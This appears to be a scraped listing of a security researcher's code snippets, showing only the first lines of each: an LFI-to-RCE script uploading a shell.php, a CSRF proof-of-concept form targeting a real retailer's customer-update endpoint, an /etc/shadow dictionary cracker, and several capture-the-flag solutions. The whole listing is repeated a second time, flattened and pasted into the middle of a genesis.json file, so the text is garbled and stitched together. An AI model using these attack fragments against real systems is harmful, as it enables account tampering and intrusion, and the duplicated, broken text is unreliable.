Aaditya Purani aadityapurani

## phantom.sh
cd /usr/local/share
sudo wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-x86_64.tar.bz2
sudo tar xjf phantomjs-1.9.8-linux-x86_64.tar.bz2
sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs
sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs
sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/bin/phantomjs

## lfi-rce.py
#Remote Code Execution from LFI
#Programmed by Aaditya Purani (https://twitter.com/aaditya_purani)
#Fixed bug in Inital Dustri's code and Implemented to run practically
import itertools
import requests
import sys
import string

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}

## beats_csrf.html
<html>
  <!-- CSRF PoC - By Aaditya Purani -->
  <body>
    <form method='POST' action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
      <input type="hidden" name="firstName" value="hacked" />
      <input type="hidden" name="lastName" value="hackerone" />
      <input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
      <input type="hidden" name="zip" value="" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />

## shadowcracker.py
#/etc/shadow Bruteforcer
#Coded by Aaditya Purani
#Just for Fun after Remote Exploitation
#It will crack shadow password by Dictionary attack

import optparse
import crypt

def checkPass(cryptPass, dname):
	salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]

## level2.py
'''
Solved by Aaditya Purani (@aaditya_purani)
Just a Proof of Concept
$python level2.py > kek
$cat kek | sort
'''

import json
import requests
list=[]

## level3.py
'''
Level 3 HackerRank Solution by Aaditya Purani
Input:
https://cdn.hackerrank.com/hackerrank/static/contests/capture-the-flag/infinite/qds.html
1000
https://cdn.hackerrank.com/hackerrank/static/contests/capture-the-flag/infinite/
'''
from bs4 import BeautifulSoup
from sets import Set
import urllib2

## sploit.js
console.log(require('fs').readFileSync('flag.txt').toString());

## rev_rev_angr.py
import angr
'''
TokyoWestern CTF rev_rev_rev solved using Angr
'''
p = angr.Project("rev_rev_rev")
ex = p.surveyors.Explorer(find=(0x08048679, ), avoid=(0x0804868B, ))
ex.run()
ex.found[0]
print ex.found[0].state.posix.dumps(0)

## pilot_exploit.py
from pwn import *

'''
Shell-Code https://www.exploit-db.com/exploits/36858/
'''

p = process('./pilot')
#p = remote('pwn.chal.csaw.io', 8464)
p.recvuntil("Location:")
buff = int(p.recvline(), 16)

## genesis.json
{
	"config": {
		"chainId": 15,
		"homesteadBlock": 0,
		"eip155Block": 0,
		"eip158Block": 0
	},
	"nonce": "0x0000000000000033",
	"timestamp": "0x0",
	"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",
	cd /usr/local/share
	sudo wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-x86_64.tar.bz2
	sudo tar xjf phantomjs-1.9.8-linux-x86_64.tar.bz2
	sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs
	sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs
	sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/bin/phantomjs
	#Remote Code Execution from LFI
	#Programmed by Aaditya Purani (https://twitter.com/aaditya_purani)
	#Fixed bug in Inital Dustri's code and Implemented to run practically
	import itertools
	import requests
	import sys
	import string

	print('[+] Trying to win the race')
	f = {'file': open('shell.php', 'rb')}
	<html>
	<!-- CSRF PoC - By Aaditya Purani -->
	<body>
	<form method='POST' action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
	<input type="hidden" name="firstName" value="hacked" />
	<input type="hidden" name="lastName" value="hackerone" />
	<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
	<input type="hidden" name="zip" value="" />
	<input type="hidden" name="phone" value="" />
	<input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />
	#/etc/shadow Bruteforcer
	#Coded by Aaditya Purani
	#Just for Fun after Remote Exploitation
	#It will crack shadow password by Dictionary attack

	import optparse
	import crypt

	def checkPass(cryptPass, dname):
	salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]
	'''
	Solved by Aaditya Purani (@aaditya_purani)
	Just a Proof of Concept
	$python level2.py > kek
	$cat kek \| sort
	'''

	import json
	import requests
	list=[]
	'''
	Level 3 HackerRank Solution by Aaditya Purani
	Input:
	https://cdn.hackerrank.com/hackerrank/static/contests/capture-the-flag/infinite/qds.html
	1000
	https://cdn.hackerrank.com/hackerrank/static/contests/capture-the-flag/infinite/
	'''
	from bs4 import BeautifulSoup
	from sets import Set
	import urllib2
	import angr
	'''
	TokyoWestern CTF rev_rev_rev solved using Angr
	'''
	p = angr.Project("rev_rev_rev")
	ex = p.surveyors.Explorer(find=(0x08048679, ), avoid=(0x0804868B, ))
	ex.run()
	ex.found[0]
	print ex.found[0].state.posix.dumps(0)
	from pwn import *

	'''
	Shell-Code https://www.exploit-db.com/exploits/36858/
	'''

	p = process('./pilot')
	#p = remote('pwn.chal.csaw.io', 8464)
	p.recvuntil("Location:")
	buff = int(p.recvline(), 16)
	{
	"config": {
	"chainId": 15,
	"homesteadBlock": 0,
	"eip155Block": 0,
	"eip158Block": 0
	},
	"nonce": "0x0000000000000033",
	"timestamp": "0x0",
	"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",